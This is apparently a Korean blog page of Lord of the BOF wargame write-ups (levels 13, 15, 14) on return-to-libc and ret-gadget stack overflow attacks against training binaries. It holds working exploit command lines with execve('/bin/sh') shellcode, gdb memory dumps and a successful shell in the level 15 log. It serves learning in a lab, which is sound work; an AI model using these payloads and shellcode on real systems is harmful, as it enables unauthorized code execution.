'pwnable' 카테고리의 글 목록 (5 Page)

pwnable

LOB 13번 2020.08.23
LOB 15번 2020.08.02
LOB 14번 2020.08.01
LOB 12번 2020.08.01
LOB 11번 2020.07.26
LOB 10번 2020.07.26
LOB 9번 2020.07.25
LOB 8번 2020.07.25

LOB 13번

2020. 8. 23. 22:40

728x90

풀이쓰기 귀찮아서 전체과정을 복붙한걸 지우고 다시 풀이를쓴다.

///////////////////////////////////////////////////////////////////////

\xbf를 쓸 수 없는것을 보아하니 정상적인 주소론 풀수없다.

여기선 RTL이라는 기법?을 사용하는데, 그냥 시스템 함수를 이용하여 푼다고 생각하면 될듯.

요약해서 말하면, 시스템 주소와 '/bin/sh'의 주소를 구해서 풀 수 있고, 해당 문자열은 시스템안에 있으므로 이 점을 이용하여 문자열의 주소를 구하면 된다.

그럼, 시스템의 주소부터 구해보자.

그냥 gdb를 하면 권한오류로 안되기 때문에 같은 길이의 파일로 복사해서 gdb를 한다.

시스템의 주소를 구하려면, 메인에 break걸어주고, r로 한번 돌린 후 print system을 하면 된다.

시스템의 주소는 0x40058ae0

이제 시스템에서 /bin/sh라는 문자열의 주소를 가져오는 코드를 작성한다.

#include <stdio.h>
#include <string.h>

int main()
{
	long system = 0x40058ae0;
    whlie(memcmp((void*)system, "/bin/sh\x00", 8))
    	{
        	system++;
        }
    printf("/bin/sh: %x\n", system);
    
    return 0;
}

필요한건 다 구했다. 이제 페이로드를 작성해보면,

`python -c 'print "a"*44 + (system addr) + "(trash)"*4 + (/bin/sh addr)'` 이다.

여기서, trash 4바이트는 RTL chaining 기법에서 사용할 chain이라고 보면 되고, 지금은 사용하지 않으므로 아무 값이나 넣어준다.

728x90

'pwnable > LOB' 카테고리의 다른 글

LOB 15번 (0)	2020.08.02
LOB 14번 (0)	2020.08.01
LOB 12번 (0)	2020.08.01
LOB 11번 (0)	2020.07.26
LOB 10번 (0)	2020.07.26

LOB 15번

2020. 8. 2. 00:11

728x90

login: giant
Password:
[giant@localhost giant]$ ls
assassin  assassin.c
[giant@localhost giant]$ cat assassin.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - assassin
        - no stack, no RTL
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        if(argv[1][47] == '\x40')
        {
                printf("library retbayed you, too!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer+sfp hunter
        memset(buffer, 0, 44);
}
[giant@localhost giant]$ ls
assassin  assassin.c
[giant@localhost giant]$ gdb -q assassin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>:       push   %ebp
0x8048471 <main+1>:     mov    %ebp,%esp
0x8048473 <main+3>:     sub    %esp,40
0x8048476 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804847a <main+10>:    jg     0x8048493 <main+35>
0x804847c <main+12>:    push   0x8048570
0x8048481 <main+17>:    call   0x8048378 <printf>
0x8048486 <main+22>:    add    %esp,4
0x8048489 <main+25>:    push   0
0x804848b <main+27>:    call   0x8048388 <exit>
0x8048490 <main+32>:    add    %esp,4
0x8048493 <main+35>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048496 <main+38>:    add    %eax,4
0x8048499 <main+41>:    mov    %edx,DWORD PTR [%eax]
0x804849b <main+43>:    add    %edx,47
0x804849e <main+46>:    cmp    BYTE PTR [%edx],0xbf
0x80484a1 <main+49>:    jne    0x80484c0 <main+80>
0x80484a3 <main+51>:    push   0x804857c
0x80484a8 <main+56>:    call   0x8048378 <printf>
0x80484ad <main+61>:    add    %esp,4
0x80484b0 <main+64>:    push   0
0x80484b2 <main+66>:    call   0x8048388 <exit>
0x80484b7 <main+71>:    add    %esp,4
0x80484ba <main+74>:    lea    %esi,[%esi]
0x80484c0 <main+80>:    mov    %eax,DWORD PTR [%ebp+12]
0x80484c3 <main+83>:    add    %eax,4
0x80484c6 <main+86>:    mov    %edx,DWORD PTR [%eax]
0x80484c8 <main+88>:    add    %edx,47
0x80484cb <main+91>:    cmp    BYTE PTR [%edx],0x40
0x80484ce <main+94>:    jne    0x80484e7 <main+119>
0x80484d0 <main+96>:    push   0x8048591
0x80484d5 <main+101>:   call   0x8048378 <printf>
0x80484da <main+106>:   add    %esp,4
0x80484dd <main+109>:   push   0
0x80484df <main+111>:   call   0x8048388 <exit>
0x80484e4 <main+116>:   add    %esp,4
0x80484e7 <main+119>:   mov    %eax,DWORD PTR [%ebp+12]
0x80484ea <main+122>:   add    %eax,4
0x80484ed <main+125>:   mov    %edx,DWORD PTR [%eax]
0x80484ef <main+127>:   push   %edx
0x80484f0 <main+128>:   lea    %eax,[%ebp-40]
0x80484f3 <main+131>:   push   %eax
0x80484f4 <main+132>:   call   0x80483a8 <strcpy>
0x80484f9 <main+137>:   add    %esp,8
0x80484fc <main+140>:   lea    %eax,[%ebp-40]
0x80484ff <main+143>:   push   %eax
0x8048500 <main+144>:   push   0x80485ae
0x8048505 <main+149>:   call   0x8048378 <printf>
0x804850a <main+154>:   add    %esp,8
0x804850d <main+157>:   push   44
0x804850f <main+159>:   push   0
0x8048511 <main+161>:   lea    %eax,[%ebp-40]
0x8048514 <main+164>:   push   %eax
0x8048515 <main+165>:   call   0x8048398 <memset>
0x804851a <main+170>:   add    %esp,12
0x804851d <main+173>:   leave
0x804851e <main+174>:   ret
0x804851f <main+175>:   nop
End of assembler dump.
(gdb)
[1]+  Stopped                 gdb -q assassin
[giant@localhost giant]$ bash2
[giant@localhost giant]$ ls
assassin  assassin.c
[giant@localhost giant]$ cp assassin essessin
[giant@localhost giant]$ ./essessin `python -c 'print "\x90"*44 + "a"*12 + "\x90"*100 + "
> \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
  File "<string>", line 1
    print "\x90"*44 + "a"*12 + "\x90"*100 + "
                                             ^
SyntaxError: invalid token
argv error
[giant@localhost giant]$ ls
assassin  assassin.c  essessin
[giant@localhost giant]$ gdb -q essessin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>:       push   %ebp
0x8048471 <main+1>:     mov    %ebp,%esp
0x8048473 <main+3>:     sub    %esp,40
0x8048476 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804847a <main+10>:    jg     0x8048493 <main+35>
0x804847c <main+12>:    push   0x8048570
0x8048481 <main+17>:    call   0x8048378 <printf>
0x8048486 <main+22>:    add    %esp,4
0x8048489 <main+25>:    push   0
0x804848b <main+27>:    call   0x8048388 <exit>
0x8048490 <main+32>:    add    %esp,4
0x8048493 <main+35>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048496 <main+38>:    add    %eax,4
0x8048499 <main+41>:    mov    %edx,DWORD PTR [%eax]
0x804849b <main+43>:    add    %edx,47
0x804849e <main+46>:    cmp    BYTE PTR [%edx],0xbf
0x80484a1 <main+49>:    jne    0x80484c0 <main+80>
0x80484a3 <main+51>:    push   0x804857c
0x80484a8 <main+56>:    call   0x8048378 <printf>
0x80484ad <main+61>:    add    %esp,4
0x80484b0 <main+64>:    push   0
0x80484b2 <main+66>:    call   0x8048388 <exit>
0x80484b7 <main+71>:    add    %esp,4
0x80484ba <main+74>:    lea    %esi,[%esi]
0x80484c0 <main+80>:    mov    %eax,DWORD PTR [%ebp+12]
0x80484c3 <main+83>:    add    %eax,4
0x80484c6 <main+86>:    mov    %edx,DWORD PTR [%eax]
0x80484c8 <main+88>:    add    %edx,47
0x80484cb <main+91>:    cmp    BYTE PTR [%edx],0x40
0x80484ce <main+94>:    jne    0x80484e7 <main+119>
0x80484d0 <main+96>:    push   0x8048591
0x80484d5 <main+101>:   call   0x8048378 <printf>
0x80484da <main+106>:   add    %esp,4
0x80484dd <main+109>:   push   0
0x80484df <main+111>:   call   0x8048388 <exit>
0x80484e4 <main+116>:   add    %esp,4
0x80484e7 <main+119>:   mov    %eax,DWORD PTR [%ebp+12]
0x80484ea <main+122>:   add    %eax,4
0x80484ed <main+125>:   mov    %edx,DWORD PTR [%eax]
0x80484ef <main+127>:   push   %edx
0x80484f0 <main+128>:   lea    %eax,[%ebp-40]
0x80484f3 <main+131>:   push   %eax
0x80484f4 <main+132>:   call   0x80483a8 <strcpy>
0x80484f9 <main+137>:   add    %esp,8
0x80484fc <main+140>:   lea    %eax,[%ebp-40]
0x80484ff <main+143>:   push   %eax
0x8048500 <main+144>:   push   0x80485ae
0x8048505 <main+149>:   call   0x8048378 <printf>
0x804850a <main+154>:   add    %esp,8
0x804850d <main+157>:   push   44
0x804850f <main+159>:   push   0
0x8048511 <main+161>:   lea    %eax,[%ebp-40]
0x8048514 <main+164>:   push   %eax
0x8048515 <main+165>:   call   0x8048398 <memset>
0x804851a <main+170>:   add    %esp,12
0x804851d <main+173>:   leave
0x804851e <main+174>:   ret
0x804851f <main+175>:   nop
End of assembler dump.
(gdb) b*main+6
Breakpoint 1 at 0x8048476
(gdb) r `python -c 'print "\x90"*44 + "a"*12 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Starting program: /home/giant/essessin `python -c 'print "\x90"*44 + "a"*12 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

Breakpoint 1, 0x8048476 in main ()
(gdb) x/300x $esp
0xbffffa40:     0xbffffa68      0x4000a970      0x400f855b      0x080495d4
0xbffffa50:     0x4000ae60      0xbffffab4      0xbffffa68      0x0804845b
0xbffffa60:     0x080495c0      0x080495d4      0xbffffa88      0x400309cb
0xbffffa70:     0x00000002      0xbffffab4      0xbffffac0      0x40013868
0xbffffa80:     0x00000002      0x080483c0      0x00000000      0x080483e1
0xbffffa90:     0x08048470      0x00000002      0xbffffab4      0x08048308
0xbffffaa0:     0x0804854c      0x4000ae60      0xbffffaac      0x40013e90
0xbffffab0:     0x00000002      0xbffffbb3      0xbffffbc8      0x00000000
0xbffffac0:     0xbffffc7e      0xbffffca0      0xbffffcaa      0xbffffcb8
0xbffffad0:     0xbffffcd7      0xbffffce5      0xbffffcfe      0xbffffd19
0xbffffae0:     0xbffffd38      0xbffffd43      0xbffffd51      0xbffffd92
0xbffffaf0:     0xbffffda3      0xbffffdb8      0xbffffdc8      0xbffffdd3
0xbffffb00:     0xbffffdf0      0xbffffdfb      0xbffffe0c      0xbffffe1c
0xbffffb10:     0xbffffe24      0x00000000      0x00000003      0x08048034
0xbffffb20:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffffb30:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffffb40:     0x00000008      0x00000000      0x00000009      0x080483c0
0xbffffb50:     0x0000000b      0x00000202      0x0000000c      0x00000202
0xbffffb60:     0x0000000d      0x00000202      0x0000000e      0x00000202
0xbffffb70:     0x00000010      0x0f8bfbff      0x0000000f      0xbffffbae
0xbffffb80:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb90:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffba0:     0x00000000      0x00000000      0x00000000      0x36690000
0xbffffbb0:     0x2f003638      0x656d6f68      0x6169672f      0x652f746e
0xbffffbc0:     0x73657373      0x006e6973      0x90909090      0x90909090
0xbffffbd0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbe0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbf0:     0x90909090      0x61616161      0x61616161      0x61616161
0xbffffc00:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc10:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc20:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc30:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc40:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc50:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc60:     0x90909090      0x6850c031      0x68732f2f      0x69622f68
0xbffffc70:     0x50e3896e      0x89e18953      0xcd0bb0c2      0x454c0080
0xbffffc80:     0x504f5353      0x7c3d4e45      0x7273752f      0x6e69622f
0xbffffc90:     0x73656c2f      0x70697073      0x68732e65      0x00732520
0xbffffca0:     0x52455355      0x454d414e      0x4948003d      0x49535453
0xbffffcb0:     0x313d455a      0x00303030      0x54534f48      0x454d414e
0xbffffcc0:     0x636f6c3d      0x6f686c61      0x6c2e7473      0x6c61636f
0xbffffcd0:     0x616d6f64      0x4c006e69      0x414e474f      0x673d454d
0xbffffce0:     0x746e6169      0x4d455200      0x4845544f      0x3d54534f
0xbffffcf0:     0x2e323931      0x2e383631      0x2e343831      0x414d0031
0xbffffd00:     0x2f3d4c49      0x2f726176      0x6f6f7073      0x616d2f6c
0xbffffd10:     0x672f6c69      0x746e6169      0x43414d00      0x50595448
0xbffffd20:     0x33693d45      0x722d3638      0x61686465      0x696c2d74
0xbffffd30:     0x2d78756e      0x00756e67      0x4d524554      0x6574783d
0xbffffd40:     0x48006d72      0x5454534f      0x3d455059      0x36383369
0xbffffd50:     0x54415000      0x752f3d48      0x6c2f7273      0x6c61636f
0xbffffd60:     0x6e69622f      0x69622f3a      0x752f3a6e      0x622f7273
0xbffffd70:     0x2f3a6e69      0x2f727375      0x52313158      0x69622f36
0xbffffd80:     0x682f3a6e      0x2f656d6f      0x6e616967      0x69622f74
0xbffffd90:     0x4f48006e      0x2f3d454d      0x656d6f68      0x6169672f
0xbffffda0:     0x4900746e      0x5455504e      0x2f3d4352      0x2f637465
0xbffffdb0:     0x75706e69      0x00637274      0x4c454853      0x622f3d4c
0xbffffdc0:     0x622f6e69      0x00687361      0x52455355      0x6169673d
0xbffffdd0:     0x4200746e      0x5f485341      0x3d564e45      0x6d6f682f
0xbffffde0:     0x69672f65      0x2f746e61      0x7361622e      0x00637268
0xbffffdf0:     0x474e414c      0x5f6e653d      0x4f005355      0x50595453
0xbffffe00:     0x696c3d45      0x2d78756e      0x00756e67      0x3d445750
0xbffffe10:     0x6d6f682f      0x69672f65      0x00746e61      0x564c4853
0xbffffe20:     0x00323d4c      0x435f534c      0x524f4c4f      0x6f6e3d53
0xbffffe30:     0x3a30303d      0x303d6966      0x69643a30      0x3b31303d
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb)
[1]+  Stopped                 gdb -q essessin
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\xe0\xfb\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
                                                   ̀
Illegal instruction
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\xe0\xfb\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
                                                   ̀
Illegal instruction
[giant@localhost giant]$ bash2
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\xe0\xfb\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
                                                   ̀
Illegal instruction
[giant@localhost giant]$ gdb -q essessin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>:       push   %ebp
0x8048471 <main+1>:     mov    %ebp,%esp
0x8048473 <main+3>:     sub    %esp,40
0x8048476 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804847a <main+10>:    jg     0x8048493 <main+35>
0x804847c <main+12>:    push   0x8048570
0x8048481 <main+17>:    call   0x8048378 <printf>
0x8048486 <main+22>:    add    %esp,4
0x8048489 <main+25>:    push   0
0x804848b <main+27>:    call   0x8048388 <exit>
0x8048490 <main+32>:    add    %esp,4
0x8048493 <main+35>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048496 <main+38>:    add    %eax,4
0x8048499 <main+41>:    mov    %edx,DWORD PTR [%eax]
0x804849b <main+43>:    add    %edx,47
0x804849e <main+46>:    cmp    BYTE PTR [%edx],0xbf
0x80484a1 <main+49>:    jne    0x80484c0 <main+80>
0x80484a3 <main+51>:    push   0x804857c
0x80484a8 <main+56>:    call   0x8048378 <printf>
0x80484ad <main+61>:    add    %esp,4
0x80484b0 <main+64>:    push   0
0x80484b2 <main+66>:    call   0x8048388 <exit>
0x80484b7 <main+71>:    add    %esp,4
0x80484ba <main+74>:    lea    %esi,[%esi]
0x80484c0 <main+80>:    mov    %eax,DWORD PTR [%ebp+12]
0x80484c3 <main+83>:    add    %eax,4
0x80484c6 <main+86>:    mov    %edx,DWORD PTR [%eax]
0x80484c8 <main+88>:    add    %edx,47
0x80484cb <main+91>:    cmp    BYTE PTR [%edx],0x40
0x80484ce <main+94>:    jne    0x80484e7 <main+119>
0x80484d0 <main+96>:    push   0x8048591
0x80484d5 <main+101>:   call   0x8048378 <printf>
0x80484da <main+106>:   add    %esp,4
0x80484dd <main+109>:   push   0
0x80484df <main+111>:   call   0x8048388 <exit>
0x80484e4 <main+116>:   add    %esp,4
0x80484e7 <main+119>:   mov    %eax,DWORD PTR [%ebp+12]
0x80484ea <main+122>:   add    %eax,4
0x80484ed <main+125>:   mov    %edx,DWORD PTR [%eax]
0x80484ef <main+127>:   push   %edx
0x80484f0 <main+128>:   lea    %eax,[%ebp-40]
0x80484f3 <main+131>:   push   %eax
0x80484f4 <main+132>:   call   0x80483a8 <strcpy>
0x80484f9 <main+137>:   add    %esp,8
0x80484fc <main+140>:   lea    %eax,[%ebp-40]
0x80484ff <main+143>:   push   %eax
0x8048500 <main+144>:   push   0x80485ae
0x8048505 <main+149>:   call   0x8048378 <printf>
0x804850a <main+154>:   add    %esp,8
0x804850d <main+157>:   push   44
0x804850f <main+159>:   push   0
0x8048511 <main+161>:   lea    %eax,[%ebp-40]
0x8048514 <main+164>:   push   %eax
0x8048515 <main+165>:   call   0x8048398 <memset>
0x804851a <main+170>:   add    %esp,12
0x804851d <main+173>:   leave
0x804851e <main+174>:   ret
0x804851f <main+175>:   nop
End of assembler dump.
(gdb) b*main
Breakpoint 1 at 0x8048470
(gdb) r `python -c 'print "\x90"*44 + "a"*8 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Starting program: /home/giant/essessin `python -c 'print "\x90"*44 + "a"*8 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

Breakpoint 1, 0x8048470 in main ()
(gdb) x/300x $esp
0xbffffa7c:     0x400309cb      0x00000002      0xbffffac4      0xbffffad0
0xbffffa8c:     0x40013868      0x00000002      0x080483c0      0x00000000
0xbffffa9c:     0x080483e1      0x08048470      0x00000002      0xbffffac4
0xbffffaac:     0x08048308      0x0804854c      0x4000ae60      0xbffffabc
0xbffffabc:     0x40013e90      0x00000002      0xbffffbb7      0xbffffbcc
0xbffffacc:     0x00000000      0xbffffc7e      0xbffffca0      0xbffffcaa
0xbffffadc:     0xbffffcb8      0xbffffcd7      0xbffffce5      0xbffffcfe
0xbffffaec:     0xbffffd19      0xbffffd38      0xbffffd43      0xbffffd51
0xbffffafc:     0xbffffd92      0xbffffda3      0xbffffdb8      0xbffffdc8
0xbffffb0c:     0xbffffdd3      0xbffffdf0      0xbffffdfb      0xbffffe0c
0xbffffb1c:     0xbffffe1c      0xbffffe24      0x00000000      0x00000003
0xbffffb2c:     0x08048034      0x00000004      0x00000020      0x00000005
0xbffffb3c:     0x00000006      0x00000006      0x00001000      0x00000007
0xbffffb4c:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffb5c:     0x080483c0      0x0000000b      0x00000202      0x0000000c
0xbffffb6c:     0x00000202      0x0000000d      0x00000202      0x0000000e
0xbffffb7c:     0x00000202      0x00000010      0x0f8bfbff      0x0000000f
0xbffffb8c:     0xbffffbb2      0x00000000      0x00000000      0x00000000
0xbffffb9c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbac:     0x00000000      0x36690000      0x2f003638      0x656d6f68
0xbffffbbc:     0x6169672f      0x652f746e      0x73657373      0x006e6973
0xbffffbcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbdc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbec:     0x90909090      0x90909090      0x90909090      0x61616161
0xbffffbfc:     0x61616161      0x90909090      0x90909090      0x90909090
0xbffffc0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc5c:     0x90909090      0x90909090      0x6850c031      0x68732f2f
0xbffffc6c:     0x69622f68      0x50e3896e      0x89e18953      0xcd0bb0c2
0xbffffc7c:     0x454c0080      0x504f5353      0x7c3d4e45      0x7273752f
0xbffffc8c:     0x6e69622f      0x73656c2f      0x70697073      0x68732e65
0xbffffc9c:     0x00732520      0x52455355      0x454d414e      0x4948003d
0xbffffcac:     0x49535453      0x313d455a      0x00303030      0x54534f48
0xbffffcbc:     0x454d414e      0x636f6c3d      0x6f686c61      0x6c2e7473
0xbffffccc:     0x6c61636f      0x616d6f64      0x4c006e69      0x414e474f
0xbffffcdc:     0x673d454d      0x746e6169      0x4d455200      0x4845544f
0xbffffcec:     0x3d54534f      0x2e323931      0x2e383631      0x2e343831
0xbffffcfc:     0x414d0031      0x2f3d4c49      0x2f726176      0x6f6f7073
0xbffffd0c:     0x616d2f6c      0x672f6c69      0x746e6169      0x43414d00
0xbffffd1c:     0x50595448      0x33693d45      0x722d3638      0x61686465
0xbffffd2c:     0x696c2d74      0x2d78756e      0x00756e67      0x4d524554
0xbffffd3c:     0x6574783d      0x48006d72      0x5454534f      0x3d455059
0xbffffd4c:     0x36383369      0x54415000      0x752f3d48      0x6c2f7273
0xbffffd5c:     0x6c61636f      0x6e69622f      0x69622f3a      0x752f3a6e
0xbffffd6c:     0x622f7273      0x2f3a6e69      0x2f727375      0x52313158
0xbffffd7c:     0x69622f36      0x682f3a6e      0x2f656d6f      0x6e616967
0xbffffd8c:     0x69622f74      0x4f48006e      0x2f3d454d      0x656d6f68
0xbffffd9c:     0x6169672f      0x4900746e      0x5455504e      0x2f3d4352
0xbffffdac:     0x2f637465      0x75706e69      0x00637274      0x4c454853
0xbffffdbc:     0x622f3d4c      0x622f6e69      0x00687361      0x52455355
0xbffffdcc:     0x6169673d      0x4200746e      0x5f485341      0x3d564e45
0xbffffddc:     0x6d6f682f      0x69672f65      0x2f746e61      0x7361622e
0xbffffdec:     0x00637268      0x474e414c      0x5f6e653d      0x4f005355
0xbffffdfc:     0x50595453      0x696c3d45      0x2d78756e      0x00756e67
0xbffffe0c:     0x3d445750      0x6d6f682f      0x69672f65      0x00746e61
0xbffffe1c:     0x564c4853      0x00333d4c      0x435f534c      0x524f4c4f
0xbffffe2c:     0x6f6e3d53      0x3a30303d      0x303d6966      0x69643a30
0xbffffe3c:     0x3b31303d      0x6c3a3433      0x31303d6e      0x3a36333b
0xbffffe4c:     0x343d6970      0x33333b30      0x3d6f733a      0x333b3130
0xbffffe5c:     0x64623a35      0x3b30343d      0x303b3333      0x64633a31
0xbffffe6c:     0x3b30343d      0x303b3333      0x726f3a31      0x3b31303d
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb)
[1]+  Stopped                 gdb -q essessin
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\x0c\xfc\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
      ̀
bash$ my-pass
euid = 515
pushing me away
bash$

728x90

'pwnable > LOB' 카테고리의 다른 글

LOB 13번 (0)	2020.08.23
LOB 14번 (0)	2020.08.01
LOB 12번 (0)	2020.08.01
LOB 11번 (0)	2020.07.26
LOB 10번 (0)	2020.07.26

LOB 14번

2020. 8. 1. 23:58

728x90

login: giant
Password:
Login incorrect

login: bugbear
Password:
[bugbear@localhost bugbear]$ ls
giant  giant.c
[bugbear@localhost bugbear]$ cat giant.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - giant
        - RTL2
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // gain address of execve
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);
        fclose(fp);

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;
        // end

        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}
[bugbear@localhost bugbear]$ ldd giant
        libc.so.6 => /lib/libc.so.6 (0x40018000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
[bugbear@localhost bugbear]$ nm /lib/libc.so.6 | grep execve
000f4860 ? __evoke_link_warning_fexecve
00091d48 t __execve
00091d48 W execve
00091da0 T fexecve
[bugbear@localhost bugbear]$ ls
giant  giant.c
[bugbear@localhost bugbear]$ cp gient giant
cp: gient: No such file or directory
[bugbear@localhost bugbear]$ cp giant jiant
[bugbear@localhost bugbear]$ rm jiant
[bugbear@localhost bugbear]$ cp giant jiant
[bugbear@localhost bugbear]$ ls
giant  giant.c  jiant
[bugbear@localhost bugbear]$ gdb -q jiant
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048560 <main>:       push   %ebp
0x8048561 <main+1>:     mov    %ebp,%esp
0x8048563 <main+3>:     sub    %esp,60
0x8048566 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804856a <main+10>:    jg     0x8048583 <main+35>
